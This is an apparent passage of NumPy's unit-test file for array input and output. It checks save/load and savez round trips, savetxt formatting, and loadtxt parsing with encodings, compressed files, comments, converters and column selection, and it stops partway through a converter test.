import sys
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes, bytes, Path
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles, assert_no_warnings
)
from numpy.testing._private.utils import requires_memory
class TextIO(BytesIO):
    """Binary buffer that transparently encodes written strings.

    Test data can be written as ``str`` while reads return ``bytes``,
    emulating a file opened in binary mode without converting strings
    to bytes at every call site.
    """

    def __init__(self, s=""):
        super(TextIO, self).__init__(asbytes(s))

    def write(self, s):
        super(TextIO, self).write(asbytes(s))

    def writelines(self, lines):
        encoded = [asbytes(line) for line in lines]
        super(TextIO, self).writelines(encoded)
# Interpreter / platform feature flags used by skip conditions below.
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32

# Optional compression modules: record availability instead of failing at
# import time, so the corresponding tests can be skipped cleanly.
HAS_BZ2 = True
try:
    import bz2
except ImportError:
    HAS_BZ2 = False

HAS_LZMA = True
try:
    import lzma
except ImportError:
    HAS_LZMA = False
def strptime(s, fmt=None):
    """Parse *s* with *fmt* and return the date part as a ``datetime``.

    Accepts either ``str`` or ``bytes``; bytes input is decoded as
    latin1 first.  Only the year/month/day fields of the parsed time
    are kept (times in the test data are irrelevant).
    """
    # isinstance (not type ==) so bytes subclasses are handled too.
    if isinstance(s, bytes):
        s = s.decode("latin1")
    return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
    """Base class checking that arrays survive a save/load round trip.

    Subclasses wrap ``roundtrip`` around a specific save function
    (``np.save``, ``np.savez``, ...) and compare ``self.arr`` against
    ``self.arr_reloaded``.
    """

    def roundtrip(self, save_func, *args, **kwargs):
        """
        save_func : callable
            Function used to save arrays to file.
        file_on_disk : bool
            If true, store the file on disk, instead of in a
            string buffer.
        save_kwds : dict
            Parameters passed to `save_func`.
        load_kwds : dict
            Parameters passed to `numpy.load`.
        args : tuple of arrays
            Arrays stored to file.
        """
        save_kwds = kwargs.get('save_kwds', {})
        load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
        file_on_disk = kwargs.get('file_on_disk', False)

        if file_on_disk:
            target_file = NamedTemporaryFile(delete=False)
            load_file = target_file.name
        else:
            target_file = BytesIO()
            load_file = target_file

        try:
            arr = args

            save_func(target_file, *arr, **save_kwds)
            target_file.flush()
            target_file.seek(0)

            # On Windows the file must be closed before np.load can
            # reopen it by name.
            if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
                target_file.close()

            arr_reloaded = np.load(load_file, **load_kwds)

            self.arr = arr
            self.arr_reloaded = arr_reloaded
        finally:
            if not isinstance(target_file, BytesIO):
                target_file.close()
                # holds an open file descriptor so it can't be deleted on win
                if 'arr_reloaded' in locals():
                    if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
                        os.remove(target_file.name)

    def check_roundtrips(self, a):
        # Exercise C order and Fortran order, both in memory and on disk.
        self.roundtrip(a)
        self.roundtrip(a, file_on_disk=True)
        self.roundtrip(np.asfortranarray(a))
        self.roundtrip(np.asfortranarray(a), file_on_disk=True)
        if a.shape[0] > 1:
            # neither C nor Fortran contiguous for 2D arrays or more
            self.roundtrip(np.asfortranarray(a)[1:])
            self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)

    def test_array(self):
        # Empty, float, int, and complex (single/double precision) arrays.
        a = np.array([], float)
        self.check_roundtrips(a)

        a = np.array([[1, 2], [3, 4]], float)
        self.check_roundtrips(a)

        a = np.array([[1, 2], [3, 4]], int)
        self.check_roundtrips(a)

        a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
        self.check_roundtrips(a)

        a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
        self.check_roundtrips(a)

    def test_array_object(self):
        # Object arrays require pickling (allow_pickle=True default above).
        a = np.array([], object)
        self.check_roundtrips(a)

        a = np.array([[1, 2], [3, 4]], object)
        self.check_roundtrips(a)

    def test_1D(self):
        a = np.array([1, 2, 3, 4], int)
        self.roundtrip(a)

    @pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
    def test_mmap(self):
        # Memory-mapped load requires an on-disk file.
        a = np.array([[1, 2.5], [4, 7.3]])
        self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})

        a = np.asfortranarray([[1, 2.5], [4, 7.3]])
        self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})

    def test_record(self):
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        self.check_roundtrips(a)

    @pytest.mark.slow
    def test_format_2_0(self):
        # 500 fields with 100-char names forces npy format version 2.0,
        # which emits a UserWarning; suppress it for the round trip.
        dt = [(("%d" % i) * 100, float) for i in range(500)]
        a = np.ones(1000, dtype=dt)
        with warnings.catch_warnings(record=True):
            warnings.filterwarnings('always', '', UserWarning)
            self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
    """Round-trip tests for the single-array ``np.save`` format."""

    def roundtrip(self, *args, **kwargs):
        RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
        saved = self.arr[0]
        reloaded = self.arr_reloaded
        assert_equal(saved, reloaded)
        assert_equal(saved.dtype, reloaded.dtype)
        assert_equal(saved.flags.fnc, reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
    """Round-trip tests for the multi-array ``np.savez`` archive format."""

    def roundtrip(self, *args, **kwargs):
        RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
        try:
            # savez names unnamed arrays arr_0, arr_1, ...
            for n, arr in enumerate(self.arr):
                reloaded = self.arr_reloaded['arr_%d' % n]
                assert_equal(arr, reloaded)
                assert_equal(arr.dtype, reloaded.dtype)
                assert_equal(arr.flags.fnc, reloaded.flags.fnc)
        finally:
            # delete tempfile, must be done here on windows
            if self.arr_reloaded.fid:
                self.arr_reloaded.fid.close()
                os.remove(self.arr_reloaded.fid.name)

    @pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
    @pytest.mark.slow
    def test_big_arrays(self):
        # Archives with >2GB members exercise zip64 handling.
        L = (1 << 31) + 100000
        a = np.empty(L, dtype=np.uint8)
        with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
            np.savez(tmp, a=a)
            del a
            npfile = np.load(tmp)
            a = npfile['a']  # Should succeed
            npfile.close()
            del a  # Avoid pyflakes unused variable warning.

    def test_multiple_arrays(self):
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        self.roundtrip(a, b)

    def test_named_arrays(self):
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        c = BytesIO()
        np.savez(c, file_a=a, file_b=b)
        c.seek(0)
        l = np.load(c)
        assert_equal(a, l['file_a'])
        assert_equal(b, l['file_b'])

    def test_BagObj(self):
        # The .f attribute exposes archive members as attributes.
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        c = BytesIO()
        np.savez(c, file_a=a, file_b=b)
        c.seek(0)
        l = np.load(c)
        assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
        assert_equal(a, l.f.file_a)
        assert_equal(b, l.f.file_b)

    def test_savez_filename_clashes(self):
        # Test that issue #852 is fixed
        # and savez functions in multithreaded environment
        def writer(error_list):
            with temppath(suffix='.npz') as tmp:
                arr = np.random.randn(500, 500)
                try:
                    np.savez(tmp, arr=arr)
                except OSError as err:
                    error_list.append(err)

        errors = []
        threads = [threading.Thread(target=writer, args=(errors,))
                   for j in range(3)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

        if errors:
            raise AssertionError(errors)

    def test_not_closing_opened_fid(self):
        # Test that issue #2178 is fixed:
        # verify could seek on 'loaded' file
        with temppath(suffix='.npz') as tmp:
            with open(tmp, 'wb') as fp:
                np.savez(fp, data='LOVELY LOAD')
            with open(tmp, 'rb', 10000) as fp:
                fp.seek(0)
                assert_(not fp.closed)
                np.load(fp)['data']
                # fp must not get closed by .load
                assert_(not fp.closed)
                fp.seek(0)
                assert_(not fp.closed)

    #FIXME: Is this still true?
    @pytest.mark.skipif(IS_PYPY, reason="Missing context manager on PyPy")
    def test_closing_fid(self):
        # Test that issue #1517 (too many opened files) remains closed
        # It might be a "weak" test since failed to get triggered on
        # e.g. Debian sid of 2012 Jul 05 but was reported to
        # trigger the failure on Ubuntu 10.04:
        # http://projects.scipy.org/numpy/ticket/1517#comment:2
        with temppath(suffix='.npz') as tmp:
            np.savez(tmp, data='LOVELY LOAD')
            # We need to check if the garbage collector can properly close
            # numpy npz file returned by np.load when their reference count
            # goes to zero.  Python 3 running in debug mode raises a
            # ResourceWarning when file closing is left to the garbage
            # collector, so we catch the warnings.  Because ResourceWarning
            # is unknown in Python < 3.x, we take the easy way out and
            # catch all warnings.
            with suppress_warnings() as sup:
                sup.filter(Warning)  # TODO: specify exact message
                for i in range(1, 1025):
                    try:
                        np.load(tmp)["data"]
                    except Exception as e:
                        msg = "Failed to load data from a file: %s" % e
                        raise AssertionError(msg)

    def test_closing_zipfile_after_load(self):
        # Check that zipfile owns file and can close it.  This needs to
        # pass a file name to load for the test. On windows failure will
        # cause a second error will be raised when the attempt to remove
        # the open file is made.
        prefix = 'numpy_test_closing_zipfile_after_load_'
        with temppath(suffix='.npz', prefix=prefix) as tmp:
            np.savez(tmp, lab='place holder')
            data = np.load(tmp)
            fp = data.zip.fp
            data.close()
            assert_(fp.closed)
class TestSaveTxt(object):
    """Tests for ``np.savetxt``: formats, headers, delimiters, encodings."""

    def test_array(self):
        a = np.array([[1, 2], [3, 4]], float)
        fmt = "%.18e"
        c = BytesIO()
        np.savetxt(c, a, fmt=fmt)
        c.seek(0)
        assert_equal(c.readlines(),
                     [asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
                      asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])

        a = np.array([[1, 2], [3, 4]], int)
        c = BytesIO()
        np.savetxt(c, a, fmt='%d')
        c.seek(0)
        assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])

    def test_1D(self):
        a = np.array([1, 2, 3, 4], int)
        c = BytesIO()
        np.savetxt(c, a, fmt='%d')
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])

    def test_0D_3D(self):
        # Only 1D and 2D arrays can be saved as text.
        c = BytesIO()
        assert_raises(ValueError, np.savetxt, c, np.array(1))
        assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))

    def test_structured(self):
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        c = BytesIO()
        np.savetxt(c, a, fmt='%d')
        c.seek(0)
        assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])

    def test_structured_padded(self):
        # gh-13297
        a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
            ('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
        ])
        c = BytesIO()
        np.savetxt(c, a[['foo', 'baz']], fmt='%d')
        c.seek(0)
        assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])

    @pytest.mark.skipif(Path is None, reason="No pathlib.Path")
    def test_multifield_view(self):
        a = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
        v = a[['x', 'z']]
        with temppath(suffix='.npy') as path:
            path = Path(path)
            np.save(path, v)
            data = np.load(path)
            assert_array_equal(data, v)

    def test_delimiter(self):
        a = np.array([[1., 2.], [3., 4.]])
        c = BytesIO()
        np.savetxt(c, a, delimiter=',', fmt='%d')
        c.seek(0)
        assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])

    def test_format(self):
        a = np.array([(1, 2), (3, 4)])
        c = BytesIO()
        # Sequence of formats
        np.savetxt(c, a, fmt=['%02d', '%3.1f'])
        c.seek(0)
        assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])

        # A single multiformat string
        c = BytesIO()
        np.savetxt(c, a, fmt='%02d : %3.1f')
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])

        # Specify delimiter, should be overridden
        c = BytesIO()
        np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
        c.seek(0)
        lines = c.readlines()
        assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])

        # Bad fmt, should raise a ValueError
        c = BytesIO()
        assert_raises(ValueError, np.savetxt, c, a, fmt=99)

    def test_header_footer(self):
        # Test the functionality of the header and footer keyword argument.
        c = BytesIO()
        a = np.array([(1, 2), (3, 4)], dtype=int)
        test_header_footer = 'Test header / footer'
        # Test the header keyword argument
        np.savetxt(c, a, fmt='%1d', header=test_header_footer)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
        # Test the footer keyword argument
        c = BytesIO()
        np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
        # Test the commentstr keyword argument used on the header
        c = BytesIO()
        commentstr = '% '
        np.savetxt(c, a, fmt='%1d',
                   header=test_header_footer, comments=commentstr)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
        # Test the commentstr keyword argument used on the footer
        c = BytesIO()
        commentstr = '% '
        np.savetxt(c, a, fmt='%1d',
                   footer=test_header_footer, comments=commentstr)
        c.seek(0)
        assert_equal(c.read(),
                     asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))

    def test_file_roundtrip(self):
        with temppath() as name:
            a = np.array([(1, 2), (3, 4)])
            np.savetxt(name, a)
            b = np.loadtxt(name)
            assert_array_equal(a, b)

    def test_complex_arrays(self):
        ncols = 2
        nrows = 2
        a = np.zeros((ncols, nrows), dtype=np.complex128)
        re = np.pi
        im = np.e
        a[:] = re + 1.0j * im

        # One format only
        c = BytesIO()
        np.savetxt(c, a, fmt=' %+.3e')
        c.seek(0)
        lines = c.readlines()
        assert_equal(
            lines,
            [b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
             b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])

        # One format for each real and imaginary part
        c = BytesIO()
        np.savetxt(c, a, fmt='  %+.3e' * 2 * ncols)
        c.seek(0)
        lines = c.readlines()
        assert_equal(
            lines,
            [b'  +3.142e+00  +2.718e+00  +3.142e+00  +2.718e+00\n',
             b'  +3.142e+00  +2.718e+00  +3.142e+00  +2.718e+00\n'])

        # One format for each complex number
        c = BytesIO()
        np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
        c.seek(0)
        lines = c.readlines()
        assert_equal(
            lines,
            [b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
             b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])

    def test_complex_negative_exponent(self):
        # Previous to 1.15, some formats generated x+-yj, gh 7895
        ncols = 2
        nrows = 2
        a = np.zeros((ncols, nrows), dtype=np.complex128)
        re = np.pi
        im = np.e
        a[:] = re - 1.0j * im
        c = BytesIO()
        np.savetxt(c, a, fmt='%.3e')
        c.seek(0)
        lines = c.readlines()
        assert_equal(
            lines,
            [b' (3.142e+00-2.718e+00j)  (3.142e+00-2.718e+00j)\n',
             b' (3.142e+00-2.718e+00j)  (3.142e+00-2.718e+00j)\n'])

    def test_custom_writer(self):
        # Any object with a .write method is accepted as output target.

        class CustomWriter(list):
            def write(self, text):
                self.extend(text.split(b'\n'))

        w = CustomWriter()
        a = np.array([(1, 2), (3, 4)])
        np.savetxt(w, a)
        b = np.loadtxt(w)
        assert_array_equal(a, b)

    def test_unicode(self):
        utf8 = b'\xcf\x96'.decode('UTF-8')
        a = np.array([utf8], dtype=np.unicode_)
        with tempdir() as tmpdir:
            # set encoding as on windows it may not be unicode even on py3
            np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
                       encoding='UTF-8')

    def test_unicode_roundtrip(self):
        utf8 = b'\xcf\x96'.decode('UTF-8')
        a = np.array([utf8], dtype=np.unicode_)
        # our gz wrapper support encoding
        suffixes = ['', '.gz']
        # stdlib 2 versions do not support encoding
        if MAJVER > 2:
            if HAS_BZ2:
                suffixes.append('.bz2')
            if HAS_LZMA:
                suffixes.extend(['.xz', '.lzma'])
        with tempdir() as tmpdir:
            for suffix in suffixes:
                np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
                           fmt=['%s'], encoding='UTF-16-LE')
                b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
                               encoding='UTF-16-LE', dtype=np.unicode_)
                assert_array_equal(a, b)

    def test_unicode_bytestream(self):
        # Writing unicode to a byte stream encodes via the given encoding.
        utf8 = b'\xcf\x96'.decode('UTF-8')
        a = np.array([utf8], dtype=np.unicode_)
        s = BytesIO()
        np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
        s.seek(0)
        assert_equal(s.read().decode('UTF-8'), utf8 + '\n')

    def test_unicode_stringstream(self):
        utf8 = b'\xcf\x96'.decode('UTF-8')
        a = np.array([utf8], dtype=np.unicode_)
        s = StringIO()
        np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
        s.seek(0)
        assert_equal(s.read(), utf8 + '\n')

    @pytest.mark.parametrize("fmt", [u"%f", b"%f"])
    @pytest.mark.parametrize("iotype", [StringIO, BytesIO])
    def test_unicode_and_bytes_fmt(self, fmt, iotype):
        # string type of fmt should not matter, see also gh-4053
        a = np.array([1.])
        s = iotype()
        np.savetxt(s, a, fmt=fmt)
        s.seek(0)
        if iotype is StringIO:
            assert_equal(s.read(), u"%f\n" % 1.)
        else:
            assert_equal(s.read(), b"%f\n" % 1.)

    @pytest.mark.skipif(sys.platform=='win32',
                        reason="large files cause problems")
    @pytest.mark.slow
    @requires_memory(free_bytes=7e9)
    def test_large_zip(self):
        # The test takes at least 6GB of memory, writes a file larger than 4GB
        test_data = np.asarray([np.random.rand(np.random.randint(50,100),4)
                                for i in range(800000)])
        with tempdir() as tmpdir:
            np.savez(os.path.join(tmpdir, 'test.npz'), test_data=test_data)
class LoadTxtBase(object):
    """Shared tests for text loaders.

    Subclasses set ``loadfunc`` to the function under test
    (``np.loadtxt`` or ``np.genfromtxt``).
    """

    def check_compressed(self, fopen, suffixes):
        # Test that we can load data from a compressed file
        wanted = np.arange(6).reshape((2, 3))
        linesep = ('\n', '\r\n', '\r')
        for sep in linesep:
            data = '0 1 2' + sep + '3 4 5'
            for suffix in suffixes:
                with temppath(suffix=suffix) as name:
                    with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
                        f.write(data)
                    # Load both by file name and by open file object.
                    res = self.loadfunc(name, encoding='UTF-32-LE')
                    assert_array_equal(res, wanted)
                    with fopen(name, "rt", encoding='UTF-32-LE') as f:
                        res = self.loadfunc(f)
                    assert_array_equal(res, wanted)

    # Python2 .open does not support encoding
    @pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
    def test_compressed_gzip(self):
        self.check_compressed(gzip.open, ('.gz',))

    @pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
    @pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
    def test_compressed_bz2(self):
        self.check_compressed(bz2.open, ('.bz2',))

    @pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
    @pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
    def test_compressed_lzma(self):
        self.check_compressed(lzma.open, ('.xz', '.lzma'))

    def test_encoding(self):
        with temppath() as path:
            with open(path, "wb") as f:
                f.write('0.\n1.\n2.'.encode("UTF-16"))
            x = self.loadfunc(path, encoding="UTF-16")
            assert_array_equal(x, [0., 1., 2.])

    def test_stringload(self):
        # umlaute
        nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
        with temppath() as path:
            with open(path, "wb") as f:
                f.write(nonascii.encode("UTF-16"))
            x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode_)
            assert_array_equal(x, nonascii)

    def test_binary_decode(self):
        utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
        v = self.loadfunc(BytesIO(utf16), dtype=np.unicode_, encoding='UTF-16')
        assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))

    def test_converters_decode(self):
        # test converters that decode strings
        c = TextIO()
        c.write(b'\xcf\x96')
        c.seek(0)
        x = self.loadfunc(c, dtype=np.unicode_,
                          converters={0: lambda x: x.decode('UTF-8')})
        a = np.array([b'\xcf\x96'.decode('UTF-8')])
        assert_array_equal(x, a)

    def test_converters_nodecode(self):
        # test native string converters enabled by setting an encoding
        utf8 = b'\xcf\x96'.decode('UTF-8')
        with temppath() as path:
            with io.open(path, 'wt', encoding='UTF-8') as f:
                f.write(utf8)
            x = self.loadfunc(path, dtype=np.unicode_,
                              converters={0: lambda x: x + 't'},
                              encoding='UTF-8')
            a = np.array([utf8 + 't'])
            assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
    """Tests specific to ``np.loadtxt``."""

    loadfunc = staticmethod(np.loadtxt)

    def setup(self):
        # lower chunksize for testing
        self.orig_chunk = np.lib.npyio._loadtxt_chunksize
        np.lib.npyio._loadtxt_chunksize = 1

    def teardown(self):
        # Restore the module-level chunk size changed in setup.
        np.lib.npyio._loadtxt_chunksize = self.orig_chunk

    def test_record(self):
        c = TextIO()
        c.write('1 2\n3 4')
        c.seek(0)
        x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        assert_array_equal(x, a)

        d = TextIO()
        d.write('M 64.0 75.0\nF 25.0 60.0')
        d.seek(0)
        mydescriptor = {'names': ('gender', 'age', 'weight'),
                        'formats': ('S1', 'i4', 'f4')}
        b = np.array([('M', 64.0, 75.0),
                      ('F', 25.0, 60.0)], dtype=mydescriptor)
        y = np.loadtxt(d, dtype=mydescriptor)
        assert_array_equal(y, b)

    def test_array(self):
        c = TextIO()
        c.write('1 2\n3 4')

        c.seek(0)
        x = np.loadtxt(c, dtype=int)
        a = np.array([[1, 2], [3, 4]], int)
        assert_array_equal(x, a)

        c.seek(0)
        x = np.loadtxt(c, dtype=float)
        a = np.array([[1, 2], [3, 4]], float)
        assert_array_equal(x, a)

    def test_1D(self):
        c = TextIO()
        c.write('1\n2\n3\n4\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int)
        a = np.array([1, 2, 3, 4], int)
        assert_array_equal(x, a)

        c = TextIO()
        c.write('1,2,3,4\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',')
        a = np.array([1, 2, 3, 4], int)
        assert_array_equal(x, a)

    def test_missing(self):
        # A converter can supply a default for an empty field.
        c = TextIO()
        c.write('1,2,3,,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       converters={3: lambda s: int(s or - 999)})
        a = np.array([1, 2, 3, -999, 5], int)
        assert_array_equal(x, a)

    def test_converters_with_usecols(self):
        c = TextIO()
        c.write('1,2,3,,5\n6,7,8,9,10\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       converters={3: lambda s: int(s or - 999)},
                       usecols=(1, 3,))
        a = np.array([[2, -999], [7, 9]], int)
        assert_array_equal(x, a)

    def test_comments_unicode(self):
        c = TextIO()
        c.write('# comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments=u'#')
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_comments_byte(self):
        c = TextIO()
        c.write('# comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments=b'#')
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_comments_multiple(self):
        c = TextIO()
        c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments=['#', '@', '//'])
        a = np.array([[1, 2, 3], [4, 5, 6]], int)
        assert_array_equal(x, a)

    def test_comments_multi_chars(self):
        c = TextIO()
        c.write('/* comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments='/*')
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

        # Check that '/*' is not transformed to ['/', '*']
        c = TextIO()
        c.write('*/ comment\n1,2,3,5\n')
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
                      comments='/*')

    def test_skiprows(self):
        c = TextIO()
        c.write('comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

        c = TextIO()
        c.write('# comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_usecols(self):
        a = np.array([[1, 2], [3, 4]], float)
        c = BytesIO()
        np.savetxt(c, a)
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(1,))
        assert_array_equal(x, a[:, 1])

        a = np.array([[1, 2, 3], [3, 4, 5]], float)
        c = BytesIO()
        np.savetxt(c, a)
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(1, 2))
        assert_array_equal(x, a[:, 1:])

        # Testing with arrays instead of tuples.
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
        assert_array_equal(x, a[:, 1:])

        # Testing with an integer instead of a sequence
        for int_type in [int, np.int8, np.int16,
                         np.int32, np.int64, np.uint8, np.uint16,
                         np.uint32, np.uint64]:
            to_read = int_type(1)
            c.seek(0)
            x = np.loadtxt(c, dtype=float, usecols=to_read)
            assert_array_equal(x, a[:, 1])

        # Testing with some crazy custom integer type
        class CrazyInt(object):
            def __index__(self):
                return 1

        crazy_int = CrazyInt()
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=crazy_int)
        assert_array_equal(x, a[:, 1])

        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
        assert_array_equal(x, a[:, 1])

        # Checking with dtypes defined converters.
        data = '''JOE 70.1 25.3
                BOB 60.5 27.9
                '''
        c = TextIO(data)
        names = ['stid', 'temp']
        dtypes = ['S4', 'f8']
        arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
        assert_equal(arr['stid'], [b"JOE", b"BOB"])
        assert_equal(arr['temp'], [25.3, 27.9])

        # Testing non-ints in usecols
        c.seek(0)
        bogus_idx = 1.5
        assert_raises_regex(
            TypeError,
            '^usecols must be.*%s' % type(bogus_idx),
            np.loadtxt, c, usecols=bogus_idx
            )

        assert_raises_regex(
            TypeError,
            '^usecols must be.*%s' % type(bogus_idx),
            np.loadtxt, c, usecols=[0, bogus_idx, 0]
            )

    def test_fancy_dtype(self):
        # Nested structured dtype.
        c = TextIO()
        c.write('1,2,3.0\n4,5,6.0\n')
        c.seek(0)
        dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
        x = np.loadtxt(c, dtype=dt, delimiter=',')
        a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
        assert_array_equal(x, a)

    def test_shaped_dtype(self):
        c = TextIO("aaaa  1.0  8.0  1 2 3 4 5 6")
        dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                       ('block', int, (2, 3))])
        x = np.loadtxt(c, dtype=dt)
        a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_3d_shaped_dtype(self):
        c = TextIO("aaaa  1.0  8.0  1 2 3 4 5 6 7 8 9 10 11 12")
        dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                       ('block', int, (2, 2, 3))])
        x = np.loadtxt(c, dtype=dt)
        a = np.array([('aaaa', 1.0, 8.0,
                       [[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_str_dtype(self):
        # see gh-8033
        c = ["str1", "str2"]

        for dt in (str, np.bytes_):
            a = np.array(["str1", "str2"], dtype=dt)

            x = np.loadtxt(c, dtype=dt)
            assert_array_equal(x, a)

    def test_empty_file(self):
        with suppress_warnings() as sup:
            sup.filter(message="loadtxt: Empty input file:")
            c = TextIO()
            x = np.loadtxt(c)
            assert_equal(x.shape, (0,))
            x = np.loadtxt(c, dtype=np.int64)
            assert_equal(x.shape, (0,))
            assert_(x.dtype == np.int64)

    def test_unused_converter(self):
        # Converters for columns excluded by usecols are ignored.
        c = TextIO()
        c.writelines(['1 21\n', '3 42\n'])
        c.seek(0)
        data = np.loadtxt(c, usecols=(1,),
                          converters={0: lambda s: int(s, 16)})
        assert_array_equal(data, [21, 42])

        c.seek(0)
        data = np.loadtxt(c, usecols=(1,),
                          converters={1: lambda s: int(s, 16)})
